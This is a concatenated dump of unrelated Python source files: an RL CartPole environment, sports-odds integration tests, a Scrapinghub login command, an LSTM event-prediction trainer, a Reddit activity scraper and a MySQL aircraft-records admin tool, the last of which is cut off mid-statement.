location)\n","sub_path":"pahera/PythonModules/StoreTrack_mod.py","file_name":"StoreTrack_mod.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"101233015","text":"import numpy as np\nimport math\n\nfrom gym.envs.classic_control.cartpole import CartPoleEnv\n\nclass CartPoleVTEnv(CartPoleEnv):\n\tdef __init__(self, task = {}):\n\t\tsuper(CartPoleVTEnv, self).__init__()\n\t\tself.task = task\n\t\tself.force_mag = task.get('force_mag', 10)\n\n\tdef sample_tasks(self, num_tasks, sampling_type, points_per_dim=-1):\n\t\tif sampling_type == 'rand':\n\t\t\tforce_mags = self.np_random.uniform(7.5, 22.5, size=(num_tasks,))\n\n\t\t\ttasks = [{'force_mag': force_mag} for force_mag in force_mags]\n\t\telif sampling_type == 'uni':\n\t\t\tassert int(num_tasks) == int(points_per_dim), 'Number of tasks(mbs) should match the points per dimension if using `uni`'\n\t\t\tforce_mags = np.linspace(7.5, 22.5, num=points_per_dim)\n\t\t\t\n\t\t\ttasks = [{'force_mag': force_mag} for force_mag in force_mags]\n\t\telif sampling_type == 'unirand':\n\t\t\tassert int(num_tasks) == int(points_per_dim), 'Number of tasks(mbs) should match the points per dimension if using `unirand`'\n\t\t\tforce_mags, fm_step = np.linspace(7.5, 22.5, endpoint=False, retstep=True, num=points_per_dim)\n\t\t\tforce_mags = force_mags + np.random.uniform(0, fm_step, size=force_mags.shape)\n\n\t\t\ttasks = [{'force_mag': force_mag} for force_mag in force_mags]\n\t\telse:\n\t\t\tassert False, 'Sampling Type should be `uni` or `rand` or `unirand`. 
Given: ' + sampling_type\n\t\treturn tasks\n\n\tdef reset_task(self, task):\n\t\tself.task = task\n\t\tself.force_mag = task['force_mag']\n\t\treturn\n\n\tdef reset(self):\n\t\tself.state = super(CartPoleVTEnv, self).reset().astype(np.float32).flatten()\n\t\treturn self.state\n\n\tdef step(self, action):\n\t\tstate, reward, done, _ = super(CartPoleVTEnv, self).step(action)\n\t\tself.state = state.astype(np.float32).flatten()\n\t\treturn self.state, reward, done, {}","sub_path":"maml_rl/envs/variable_tasks/cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"579859798","text":"\n\nfrom xai.brain.wordbase.nouns._infield import _INFIELD\n\n#calss header\nclass _INFIELDS(_INFIELD, ):\n\tdef __init__(self,): \n\t\t_INFIELD.__init__(self)\n\t\tself.name = \"INFIELDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"infield\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_infields.py","file_name":"_infields.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"150972478","text":"from pysbr.config.sport import NFL, NCAAF, ATP\nfrom datetime import datetime\n\n\nclass TestIntegration:\n def test_last_year_group_nfl(\n self,\n events_by_date,\n event_groups_by_league,\n events_by_event_group,\n current_lines,\n ):\n dt = datetime.strptime(\"2019-09-05\", \"%Y-%m-%d\")\n nfl = NFL()\n league_id = nfl.league_id\n\n # get last year season by using events by date\n e1 = events_by_date(league_id, dt, \"integration_test_last_year_group_nfl1\")\n e1list = e1.list()\n season_id = e1list[0].get(\"season id\")\n\n # get season's event groups\n e2 = event_groups_by_league(league_id, \"integration_test_last_year_group_nfl2\")\n e2list = e2.list()\n\n # get week 10\n week10_id = [\n x.get(\"event group id\") for x in e2list if x.get(\"alias\") == \"Week 10\"\n ].pop()\n\n market_id = nfl.market_ids(\"1hou\")[0]\n e3 = events_by_event_group(\n league_id,\n week10_id,\n season_id,\n market_id,\n \"integration_test_last_year_group_nfl3\",\n )\n\n cl = current_lines(\n e3.ids(), [market_id], [20], \"integration_test_last_year_group_nfl4\"\n )\n df = cl.dataframe(e3)\n assert df is not None\n\n def test_team_lines_ncaaf(self, events_by_participants, best_lines):\n ncaaf = NCAAF()\n lid = ncaaf.league_id\n spid = ncaaf.sport_id\n bama = ncaaf.team_ids([\"alabama\"])\n\n sdt = datetime.strptime(\"2019-09-05\", \"%Y-%m-%d\")\n edt = datetime.strptime(\"2019-10-30\", \"%Y-%m-%d\")\n\n e = events_by_participants(\n bama,\n sdt,\n edt,\n lid,\n spid,\n \"integration_test_team_lines_ncaaf1\",\n \"integration_test_team_lines_ncaaf2\",\n )\n\n market_ids = ncaaf.market_ids([\"fgps\", \"ml\"])\n b = best_lines(e.ids(), market_ids, \"integration_test_team_lines_ncaaf3\")\n df = b.dataframe(e)\n assert df is not None\n\n def test_rivalry_nfl(self, events_by_matchup, opening_lines):\n nfl = NFL()\n ids = nfl.team_ids([\"chicago\", \"packers\"])\n market_ids = nfl.market_ids([\"1qou\", \"4qml\", \"2qml\", \"2hps\"])\n e = events_by_matchup(ids[0], ids[1], 10, \"integration_test_rivalry_nfl1\")\n o = opening_lines(e.ids(), market_ids, 20, \"integration_test_rivalry_nfl2\")\n\n df = o.dataframe(e)\n assert df is not None\n\n def test_search_atp(\n self,\n search_events,\n events_by_participants_recent,\n current_lines,\n ):\n # This test will fail if querying server if Nadal does not have any 
upcoming\n # events.\n e = search_events(\"Nadal\", \"integration_test_search_atp1\")\n\n nadal = None\n for x in e.list():\n for y in x.get(\"participants\"):\n try:\n if y[\"source\"][\"last name\"] == \"Nadal\":\n\n nadal = y[\"participant id\"]\n except KeyError:\n pass\n\n e2 = None\n if nadal is not None:\n e2 = events_by_participants_recent([nadal], \"integration_test_search_atp2\")\n\n df = e2.dataframe()\n\n atp = ATP()\n market_ids = atp.market_ids([\"ou\", \"ps\", \"ml\"])\n\n c = current_lines(\n e2.ids(), market_ids, [5, 20, 9], \"integration_test_search_atp3\"\n )\n df = c.dataframe(e2)\n\n assert df is not None\n\n def test_epl(\n self,\n search_leagues,\n league_hierarchy,\n events_by_date,\n league_markets,\n current_lines,\n ):\n # 'epl' fails\n s = search_leagues(\"premier league\", \"integration_test_epl1\")\n\n assert s is not None\n\n league_id = 2\n # sport_id = 2\n\n # league hierarchy is empty for EPL!\n lh = league_hierarchy(league_id, \"integration_test_epl2\")\n df = lh.dataframe()\n\n dt = datetime.strptime(\"2020-11-21\", \"%Y-%m-%d\")\n e = events_by_date(league_id, dt, \"integration_test_epl3\")\n\n # lm = league_markets(2, \"integration_test_epl4\")\n\n # I got these from inspecting in Chrome, league_markets returns too many\n market_ids = [1, 395, 396]\n c = current_lines(e.ids(), market_ids, 20, \"integration_test_epl5\")\n\n df = c.dataframe(e)\n assert df is not None\n\n\n# try and get odds for the election\n#\n#\n# try horse racing\n\n# get odds for jake paul vs nate robinson - do line history\n#\n","sub_path":"tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20804878","text":"import re\nimport click\nimport os\nfrom shub import auth\nfrom shub.click_utils import log\nfrom six.moves import input\n\n\n@click.command(help='add Scrapinghug API key into the netrc file')\n@click.pass_context\ndef cli(context):\n if auth.get_key_netrc():\n log(\"You're already logged in. To change credentials, use 'shub logout' first.\")\n return 0\n\n cfg_key = _find_cfg_key()\n key = _prompt_for_key(suggestion=cfg_key)\n\n if not key and is_valid_key(cfg_key):\n auth.write_key_netrc(cfg_key)\n elif key and is_valid_key(key):\n auth.write_key_netrc(key)\n else:\n context.fail('Invalid key. 
Tip: your key must have 32 characters.')\n log('Success.')\n\n\ndef is_valid_key(key):\n return bool(re.match(r'[A-Fa-f\\d]{32}$', key))\n\n\ndef _prompt_for_key(suggestion):\n suggestion_txt = ''\n if suggestion:\n suggestion_txt = '(%s) ' % suggestion\n\n prompt = 'Insert your Scrapinghub API key %s: ' % suggestion_txt\n return input(prompt)\n\n\ndef _find_cfg_key():\n cfg_key = _read_scrapy_cfg_key()\n if cfg_key:\n return cfg_key\n\n envkey = os.getenv(\"SHUB_APIKEY\")\n if envkey:\n return envkey\n\ndef _read_scrapy_cfg_key():\n try:\n from scrapy.utils.conf import get_config\n cfg = get_config()\n\n if cfg.has_section('deploy'):\n deploy = dict(cfg.items('deploy'))\n key = deploy.get('username')\n\n if key:\n return key\n except:\n return\n","sub_path":"shub/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"521891001","text":"#!/usr/bin/env python\n\n\"\"\"\nThis script takes an event log in csv format and trains an LSTM model for predicting the next event in a case.\n\nAuthor: Irene Teinemaa\n\"\"\"\n\nfrom keras.models import Sequential\nimport numpy as np\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout\nfrom keras.layers.recurrent import LSTM\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.callbacks import ModelCheckpoint\n\n\n# path to the input dataset\ninput_filename = \"event_log.csv\"\n\n# path where the LSTM models (checkpoints) are saved\ncheckpoint_filepath = \"model_weights.{epoch:02d}-{val_loss:.2f}.hdf5\"\n\n# LSTM parameters\nlstmsize = 48\ndropout = 0.2\noptim = 'rmsprop'\nactivation = 'softmax'\nloss = 'categorical_crossentropy'\nnb_epoch = 10\nbatch_size = 64\nvalidation_ratio = 0.2\n\n# relevant column names\nactivity_col = \"Activity\"\ncase_id_col = \"Case ID\"\ntimestamp_col = \"Complete Timestamp\"\n\n\n# read the dataset\ndata = pd.read_csv(input_filename, sep=\";\")\ndata[timestamp_col] = pd.to_datetime(data[timestamp_col])\n\n# one-hot encode the activity\ncat_data = pd.get_dummies(data[[activity_col]])\ndt_final = pd.concat([data[[case_id_col, timestamp_col]], cat_data], axis=1).fillna(0)\n\n# add dummy columns for case start and case end\ndt_final[\"START\"] = 0\ndt_final[\"END\"] = 0\n\n# assign model dimensions\ngrouped = dt_final.groupby(case_id_col)\nmax_events = grouped.size().max() # maximum case length\ndata_dim = dt_final.shape[1] - 2 # our input dataset will contain columns for each activity type, including the dummy start and end activities. We are excluding timestamp and case_id, therefore -2\ntime_dim = max_events + 1 # +1 comes from adding the artificial start points. 
We are not considering the end points here, because the LSTM input is one less than the case length (the last training sample for a case predicts the end event)\n\n# generate one-hot vectors representing the dummy endpoints\nstart = np.zeros(data_dim, dtype=int)\nstart[-2] = 1\nend = np.zeros(data_dim, dtype=int)\nend[-1] = 1\n\nprint('Constructing LSTM input data...')\nX = np.zeros((len(dt_final)+len(grouped), time_dim, data_dim))\ny = np.zeros((len(dt_final)+len(grouped), data_dim))\ncase_idx = 0\nfor name, group in grouped:\n group = group.sort_values(timestamp_col, ascending=True, kind=\"mergesort\").as_matrix()[:,2:]\n # adding the artificial start and end-points to the case\n group = np.vstack([start, group, end])\n # generate training samples for each prefix of the case, where LSTM input is the prefix and prediction target is the next event\n for i in range(1, len(group)):\n X[case_idx] = pad_sequences(group[np.newaxis,:i,:], maxlen=time_dim)\n y[case_idx] = group[i,:]\n case_idx += 1\n \nprint('Building model...')\nmodel = Sequential()\nmodel.add(LSTM(lstmsize, input_shape=(time_dim, data_dim)))\nmodel.add(Dropout(dropout))\nmodel.add(Dense(data_dim, activation=activation))\n \nprint('Compiling model...')\nmodel.compile(loss=loss, optimizer=optim)\n\nprint(\"Training...\")\ncheckpointer = ModelCheckpoint(filepath=checkpoint_filepath, verbose=1, save_best_only=True, save_weights_only=True)\nmodel.fit(X, y, nb_epoch=nb_epoch, batch_size=batch_size, verbose=2, validation_split=validation_ratio, callbacks=[checkpointer])\nprint(\"Done.\")\n","sub_path":"train_LSTM_next_event.py","file_name":"train_LSTM_next_event.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"597007618","text":"import pandas\nfrom praw import Reddit\nfrom prawcore import exceptions\nfrom praw.models import Submission, Comment, Redditor\n\nimport config\nfrom content_parsing import parse_submission, parse_comment\nfrom exactly_once_queue import exactlyOnceQueue\n\n\ndef reddit_activity(username: str):\n \"\"\"Requests comment and submission data for the given user and any other users they have interacted with.\n Interactions between users are when the given user has replied to a submission or comment by another user.\n Writes data to out/{username}.csv.\n \"\"\"\n reddit = Reddit(client_id=config.client_id,\n client_secret=config.client_secret,\n user_agent=config.user_agent)\n\n # Build queue of users to collect activity of: provided user and users they have interacted via replying\n # Also append users who have interacted with provided user (they replied to a post/comment)\n users = exactlyOnceQueue()\n users.append(username)\n redditor = Redditor(reddit, name=username)\n\n for comment in redditor.comments.new():\n if comment.parent().author:\n users.append(str(comment.parent().author))\n # Add users who have replied to this comment\n for reply in comment.replies:\n if reply.author:\n users.append(str(reply.author))\n\n\n for submission in redditor.submissions.new():\n # Add users who have replied to this submission\n for reply in submission.comments:\n if reply.author:\n users.append(str(reply.author))\n\n\n\n # Get comment and submission data of each user and append to list\n data = []\n print(f'users to process:{str(len(users))}')\n while len(users) > 0:\n redditor = Redditor(reddit, name=users.pop()) # type: Redditor\n try:\n for submission in redditor.submissions.new(): # type: Submission\n row = 
parse_submission(submission)\n                data.append(row)\n            for comment in redditor.comments.new(): # type: Comment\n                row = parse_comment(comment)\n                data.append(row)\n        except exceptions.NotFound:\n            print(f'Exception occurred on user {str(redditor)}')\n        except exceptions.Forbidden:\n            print(f'Exception occurred on user {str(redditor)}')\n        print(f'user complete, remaining = {str(len(users))}')\n\n    # Construct DataFrame from list and write to CSV\n    df = pandas.DataFrame(data=data, columns=['id', 'author', 'date', 'subreddit', 'replyingTo', 'polarity', 'subjectivity', 'replyCount'])\n    df.set_index('id', inplace=True)\n    df.to_csv(f'out/{username}.csv')","sub_path":"data/reddit_activity.py","file_name":"reddit_activity.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254554514","text":"import subprocess as sp\nfrom sys import executable\n# from subprocess import Popen, CREATE_NEW_CONSOLE\nimport pymysql\nfrom prettytable import PrettyTable\n\n# Popen([executable, 'script.py'], creationflags=CREATE_NEW_CONSOLE)\n\n# input('Enter to exit from this launcher script...')\n\ndef display(table_name):\n    query = \"SELECT * FROM {}\".format(str(table_name))\n    cursor.execute(query)\n\n    # use the column names reported by the cursor as the header row,\n    # add every fetched row, and print the table (the original consumed\n    # the first row as headers, crashed on list(None), and never printed)\n    t = PrettyTable([col[0] for col in cursor.description])\n    row = cursor.fetchone()\n    while row is not None:\n        t.add_row(list(row))\n        row = cursor.fetchone()\n    print(t)\n\n# ---- ADMIN START -----\n\n## ---- AUDIT START ----\n\ndef add_audit():\n    name = input(\"Enter Agency Name: \") \n    query = \"INSERT INTO AUDIT_AGENCY (NAME) VALUES (%s)\"\n    try:\n        cursor.execute(query, (name))\n        db.commit()\n    except:\n        print(\"Error: Check value and try again\")\n\ndef delete_audit():\n    ID = int(input(\"Enter Agency ID: \"))\n    try:\n        query = \"DELETE FROM AUDIT_AGENCY WHERE ID = %s\"\n        cursor.execute(query, (ID))\n        db.commit()\n    except:\n        print(\"Error: Check ID again and try again\")\n\ndef update_audit():\n    name = input(\"Enter Agency Name: \") \n    ID = int(input(\"Enter Agency ID to be updated: \"))\n    try:\n        query = \"UPDATE AUDIT_AGENCY SET NAME = %s WHERE ID = %s\"\n        cursor.execute(query, (name, ID))\n        db.commit()\n    except:\n        print(\"Error: Check ID again and try again\")\n\ndef audit():\n    print(\"1. View All\")\n    print(\"2. Insert\")\n    print(\"3. Delete\")\n    print(\"4. Update\")\n    print(\"5. Quit\")\n    ch = int(input(\"Enter choice :> \"))\n    if ch is 5:\n        return\n    elif ch>=6 or ch<1:\n        print(\"Error: Option does not exist.\")\n    else:\n        if ch is 1:\n            display(\"AUDIT_AGENCY\")\n        elif ch is 2:\n            add_audit()\n        elif ch is 3:\n            delete_audit()\n        elif ch is 4:\n            update_audit()\n\n## ----- AUDIT END -----\n## ----- PURCHASER START -----\n\ndef add_purchaser():\n    name = input(\"Enter Purchaser Name: \") \n    try:\n        query = \"INSERT INTO PURCHASER (NAME) VALUES (%s)\"\n        cursor.execute(query, (name))\n        db.commit()\n    except:\n        print(\"Error.\")\n\ndef delete_purchaser():\n    ID = int(input(\"Enter Purchaser ID: \"))\n    try:\n        query = \"DELETE FROM PURCHASER WHERE ID = %s\"\n        cursor.execute(query, (ID))\n        db.commit()\n    except:\n        print(\"Error.\")\n\ndef update_purchaser():\n    name = input(\"Enter Purchaser Name: \") \n    ID = int(input(\"Enter Purchaser ID to be updated: \"))\n    try:\n        query = \"UPDATE PURCHASER SET NAME = %s WHERE ID = %s\"\n        cursor.execute(query, (name, ID))\n        db.commit()\n    except:\n        print(\"Error: Check ID again and try again\")\n\ndef purchaser():\n\n    print(\"1. View All\")\n    print(\"2. Insert\")\n    print(\"3. Delete\")\n    print(\"4. Update\")\n    print(\"5. 
Quit\")\n    ch = int(input(\"Enter choice :> \"))\n    tmp = sp.call('clear',shell=True)\n    if ch is 5:\n        return\n    elif ch>=6 or ch<1:\n        print(\"Error: Option does not exist.\")\n    else:\n        if ch is 1:\n            display(\"PURCHASER\")\n        elif ch is 2:\n            add_purchaser()\n        elif ch is 3:\n            delete_purchaser()\n        elif ch is 4:\n            update_purchaser()\n\n## ---- PURCHASER END ------\n## ---- COMPANY START ------\n\ndef add_company(name=None):\n    # accept an optional name so callers like add_parts can pass one in\n    # (it was previously called as add_company(man_name) with a no-arg def);\n    # prompt only when no name is supplied\n    if name is None:\n        name = input(\"Enter Manufacturer Name: \") \n    query = \"INSERT INTO COMPANY (NAME) VALUES (%s)\"\n    try:\n        cursor.execute(query, (name))\n        db.commit()\n    except:\n        print(\"Error\")\n\ndef delete_company():\n    ID = int(input(\"Enter Company ID: \"))\n    query = \"DELETE FROM COMPANY WHERE ID = %s\"\n    try:\n        cursor.execute(query, (ID))\n        db.commit()\n    except:\n        print(\"Error\")\n\ndef update_company():\n    name = input(\"Enter Company Name: \") \n    ID = int(input(\"Enter Company ID to be updated: \"))\n    try:\n        query = \"UPDATE COMPANY SET NAME = %s WHERE ID = %s\"\n        cursor.execute(query, (name, ID))\n        db.commit()\n    except:\n        print(\"Error: Check ID again and try again\")\n\ndef company():\n    print(\"1. View All\")\n    print(\"2. Insert\")\n    print(\"3. Delete\")\n    print(\"4. Update\")\n    print(\"5. Quit\")\n    ch = int(input(\"Enter choice :> \"))\n    tmp = sp.call('clear',shell=True)\n    if ch is 5:\n        return\n    elif ch>=6 or ch<1:\n        print(\"Error: Option does not exist.\")\n    else:\n        if ch is 1:\n            display(\"COMPANY\")\n        elif ch is 2:\n            add_company()\n        elif ch is 3:\n            delete_company()\n        elif ch is 4:\n            update_company()\n\n## ---- COMPANY END --------\n## ---- PARTS START --------\n\ndef add_parts():\n\tman_name = input(\"Enter Manufacturer Name: \") \n\tpart_name = input(\"Enter Part Name: \")\n\tclassification = input(\"Enter Type of Part: \")\n\n\ttry:\n\t\tif classification == \"Engine\" or classification == \"engine\":\n\t\t\tquery = \"SELECT EXISTS(SELECT * FROM ENGINE WHERE %s IN (SELECT NAME FROM ENGINE))\"\n\t\t\tcursor.execute(query, (part_name))\n\t\t\trow = cursor.fetchone()\n\t\t\t\n\t\t\tif row[0] == 1:\n\t\t\t\tprint(\"Part Already Exists\")\n\t\t\telse:\n\t\t\t\tquery = \"SELECT EXISTS(SELECT * FROM COMPANY WHERE %s IN (SELECT NAME FROM COMPANY))\"\t\t\t\t\t\t\n\t\t\t\tcursor.execute(query, (man_name))\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\t\n\t\t\t\tif row[0] == 0:\n\t\t\t\t\tadd_company(man_name)\n\n\t\t\t\tquery = \"SELECT ID FROM COMPANY WHERE NAME = %s\"\n\t\t\t\tcursor.execute(query, (man_name))\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\tman_id = row[0]\n\n\t\t\t\tcost = int(input(\"Enter Cost of part: \"))\n\t\t\t\tpower = int(input(\"Enter Power of Engine: \"))\n\t\t\t\tclassification = input(\"Enter Type of Engine: \")\n\t\t\t\t\n\t\t\t\tquery = \"INSERT INTO PARTS (MANUFACTURER_ID,COST) VALUES (%s,%s)\"\n\t\t\t\tprint(\"Manufacturer id \",man_id,type(man_id))\n\t\t\t\tprint(\"Cost \",cost,type(cost))\n\t\t\t\tcursor.execute(query, (int(man_id),int(cost)))\n\n\t\t\t\tprint(\"Inserted into parts table\")\n\t\t\t\t\n\t\t\t\tquery = \"SELECT ID FROM PARTS ORDER BY ID DESC LIMIT 1;\"\n\t\t\t\tcursor.execute(query)\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\tpart_id = row[0]\n\t\t\t\t\n\t\t\t\tquery = \"INSERT INTO ENGINE (PART_ID,NAME,TYPE,POWER) VALUES (%s,%s,%s,%s);\"\n\t\t\t\tcursor.execute(query,(part_id,part_name,classification,power))\n\n\t\t\t\tprint(\"Inserted into engine table\")\n\t\t\t\tprint(\"Successfully Added\")\n\n\t\t\t\tdb.commit();\n\n\t\telif classification == \"Software\" or classification == \"software\":\n\t\t\tquery = \"SELECT EXISTS(SELECT * FROM SOFTWARE WHERE 
%s IN (SELECT NAME FROM SOFTWARE))\"\n\t\t\tcursor.execute(query, (part_name))\n\t\t\trow = cursor.fetchone()\n\t\t\t\n\t\t\tif row[0] == 1:\n\t\t\t\tprint(\"Part Already Exists\")\n\t\t\telse:\n\t\t\t\tquery = \"SELECT EXISTS(SELECT * FROM COMPANY WHERE %s IN (SELECT NAME FROM COMPANY))\"\t\t\t\t\t\t\n\t\t\t\tcursor.execute(query, (man_name))\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\t\n\t\t\t\tif row[0] == 0:\n\t\t\t\t\tadd_company(man_name)\n\n\t\t\t\tquery = \"SELECT ID FROM COMPANY WHERE NAME = %s\"\n\t\t\t\tcursor.execute(query, (man_name))\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\tman_id = row[0]\n\n\t\t\t\tcost = int(input(\"Enter Cost of part: \"))\n\t\t\t\t\n\t\t\t\tquery = \"INSERT INTO PARTS (MANUFACTURER_ID,COST) VALUES (%s,%s)\"\n\t\t\t\tprint(\"Manufacturer id \",man_id,type(man_id))\n\t\t\t\tprint(\"Cost \",cost,type(cost))\n\t\t\t\tcursor.execute(query, (int(man_id),int(cost)))\n\n\t\t\t\tprint(\"Inserted into parts table\")\n\t\t\t\t\n\t\t\t\tquery = \"SELECT ID FROM PARTS ORDER BY ID DESC LIMIT 1;\"\n\t\t\t\tcursor.execute(query)\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\tpart_id = row[0]\n\t\t\t\t\n\t\t\t\tquery = \"INSERT INTO SOFTWARE (PART_ID,NAME) VALUES (%s,%s);\"\n\t\t\t\tcursor.execute(query,(part_id,part_name))\n\n\t\t\t\tprint(\"Inserted into engine table\")\n\t\t\t\tprint(\"Successfully Added\")\n\n\t\t\t\tdb.commit();\n\t\telse:\n\t\t\tprint(\"Incorrect part type entered\")\n\texcept:\n\t\tprint(\"Error found somewhere\")\n\ndef delete_parts():\n ID = int(input(\"Enter Part ID: \"))\n query = \"DELETE FROM PARTS WHERE ID = %s\"\n try:\n cursor.execute(query, (ID))\n db.commit()\n except:\n print(\"Error\")\t\n\ndef parts():\n print(\"1. View All\")\n print(\"2. Insert\")\n print(\"3. Delete\")\n print(\"4. Quit\")\n ch = int(input(\"Enter choice :> \"))\n tmp = sp.call('clear',shell=True)\n if ch is 4:\n return\n elif ch>4 or ch<1:\n print(\"Error: Option does not exist.\")\n else:\n if ch is 1:\n display(\"PARTS\")\n elif ch is 2:\n add_parts()\n elif ch is 3:\n delete_parts()\n\n## --- PARTS END -------\n## ------ PLANE START ---------\n\ndef add_plane():\n\tname = input(\"Enter Plane Model Name: \");\n\n\tquery = \"SELECT EXISTS(SELECT * FROM PLANE WHERE %s IN (SELECT NAME FROM PLANE))\"\n\tcursor.execute(query, (name))\n\trow = cursor.fetchone()\n\t\n\ttry:\n\t\tif row[0] == 1:\n\t\t\tprint(\"Plane already exists\")\n\t\telse:\n\t\t\tdate_of_release = input(\"Enter Plane Release Date: \");\n\t\t\t\n\t\t\tquery = \"SELECT EXISTS(SELECT * FROM PLANE_AGE WHERE %s IN (SELECT DATE FROM PLANE_AGE))\"\n\t\t\tcursor.execute(query, (date_of_release))\n\t\t\trow = cursor.fetchone()\n\t\t\t\n\t\t\tif row[0] == 0:\n\t\t\t\tquery = \"INSERT INTO PLANE_AGE VALUES(%s,TIMESTAMPDIFF(YEAR, %s, CURDATE()));\"\n\t\t\t\tcursor.execute(query, (date_of_release,date_of_release))\n\n\t\t\treference_code = \"\"\n\t\t\twhile reference_code == \"\":\n\t\t\t\treference_code = input(\"Enter Reference code: \");\n\t\t\t\tquery = \"SELECT EXISTS(SELECT * FROM PLANE WHERE %s IN (SELECT REFERENCE_CODE FROM PLANE))\"\n\t\t\t\tcursor.execute(query, (date_of_release))\n\t\t\t\trow = cursor.fetchone()\n\t\t\t\tif row[0] == 1:\n\t\t\t\t\tprint(\"Reference code already in use. 
Please Enter New Reference Code\")\n\t\t\t\t\treference_code = \"\"\n\n\t\t\twing_dim = input(\"Enter Wingspan Dimensions: \");\n\t\t\tnose_dim = input(\"Enter Nose-Tail Dimensions: \");\n\t\t\tsafe_runway_len = input(\"Enter Safe Runway Length: \");\n\t\t\tcapacity = input(\"Enter Plane Capacity: \");\n\n\t\t\tquery = \"INSERT INTO PLANE (NAME,REFERENCE_CODE,DATE_OF_RELEASE,WINGSPAN_DIMENSIONS,NOSE_TAIL_DIMENSIONS,SAFE_RUNWAY_LENGTH,CAPACITY) VALUES (%s,%s,%s,%s,%s,%s,%s);\"\n\t\t\tcursor.execute(query,(name,reference_code,date_of_release,wing_dim,nose_dim,safe_runway_len,capacity))\n\t\t\tdb.commit()\n\texcept:\n\t\tprint(\"Error.\")\n\ndef delete_plane():\n ID = int(input(\"Enter Plane ID: \"))\n query = \"DELETE FROM PLANE WHERE ID = %s\"\n try:\n cursor.execute(query, (ID))\n db.commit()\n except:\n print(\"Error.\")\n\ndef update_plane():\n name = input(\"Enter Plane Name: \") \n ID = int(input(\"Enter Plane ID to be updated: \"))\n try:\n query = \"UPDATE Plane SET NAME = %s WHERE ID = %s\"\n cursor.execute(query, (name, ID))\n db.commit()\n except:\n print(\"Error: Check ID again and try again\")\n\ndef plane():\n print(\"1. View All\")\n print(\"2. Insert\")\n print(\"3. Delete\")\n print(\"4. Update\")\n print(\"5. Quit\")\n ch = int(input(\"Enter choice :> \"))\n tmp = sp.call('clear',shell=True)\n if ch is 5:\n return\n elif ch>=6 or ch<1:\n print(\"Error: Option does not exist.\")\n else:\n if ch is 1:\n display(\"PLANE\")\n elif ch is 2:\n add_plane()\n elif ch is 3:\n delete_plane()\n elif ch is 4:\n update_plane()\n\n## ------ PLANE END -----------\n\ndef admin():\n \n while(1):\n tmp = sp.call('clear',shell=True)\n print(\"1. Audit Table\")\n print(\"2. Purchaser Table\")\n print(\"3. Company Table\")\n print(\"4. Parts Table\")\n print(\"5. Plane Table\")\n print(\"6. Quit\")\n print(\"7. 
Clear\")\n\n ch = int(input(\"Enter choice :> \"))\n if ch==6:\n break\n elif ch>6 or ch<1:\n print(\"Error: Option does not exist.\")\n else:\n if ch is 1:\n audit()\n elif ch is 2:\n purchaser()\n elif ch is 3:\n company()\n elif ch is 4:\n parts()\n else:\n plane()\n\n# ----- ADMIN END ---------\n\n# ----- EMPLOYEE START -----\n\ndef add_Purchase():\n print(\"Enter the following details\")\n cname = input(\"Purchaser name: \")\n pname = input(\"Plane model name: \")\n qty = int(input(\"Enter Quantity: \"))\n prog = int(input(\"Progress: \"))\n dtp = input(\"Date of Purchase: \")\n dtd = input(\"Date of Decommission Date: \")\n\n try:\n sql = \"INSERT INTO SALE (PLANE_MODEL_ID, COMPANY_ID, QUANTITY, PROGRESS) VALUES ((SELECT ID FROM PLANE WHERE NAME LIKE '%s'), (SELECT ID FROM PURCHASE WHERE NAME LIKE '%s'), %d, %d);\"%(pname, cname, qty, prog)\n cursor.execute(sql)\n db.commit()\n sql = \"INSERT INTO LIST_OF_PLANES (PLANE_MODEL_ID, PURCHASER_ID, DATE_OF_PURCHASE, SALE_ID, DECOMMISION_DATE) VALUES ((SELECT ID FROM PLANE WHERE NAME LIKE '%s'), (SELECT ID FROM PURCHASE WHERE NAME LIKE '%s'), %s, LAST_INSERT_ID(), '%s'));\" %(pname, cname, dtp, dtd)\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error\")\n\ndef view_Purchase():\n try:\n sql = \"SELECT P.ID, P.NAME, S.ID SALE_ID, S.PLANE_MODEL_ID, S.QUANTITY, S.PROGRESS, L.DATE_OF_PURCHASE, L.DECOMMISION_DATE FROM PURCHASER P, SALE S, LIST_OF_PLANES L WHERE P.ID = S.COMPANY_ID AND P.ID = L.PURCHASER_ID;\"\n cursor.execute(sql)\n db.commit()\n\n row = cursor.fetchone()\n while row is not None:\n print(row)\n row = cursor.fetchone() \n except:\n print(\"Error\")\n\ndef add_Maintenance ():\n print(\"Enter the following details\")\n cname = input(\"Audit Agency name: \")\n pname = input(\"Plane model name: \")\n dtp = input(\"Date of maintenance: \")\n dtd = int(input(\"Cost: \"))\n parts = input(\"Part Changed: \")\n pid = input(\"ID of the part changed\")\n \n try:\n sql = \"INSERT INTO MAINTENANCE_REPORTS (AUDITOR_ID, PLANE_MODEL_ID, MAINTENANCE_DATE, COST, PARTS_CHANGED) VALUES ( (SELECT ID FROM AUDIT_AGENCY WHERE NAME LIKE '%s'), (SELECT ID FROM PLANE WHERE NAME LIKE '%s'), '%s', %d, '%s');\"%(cname, pname, dtp, 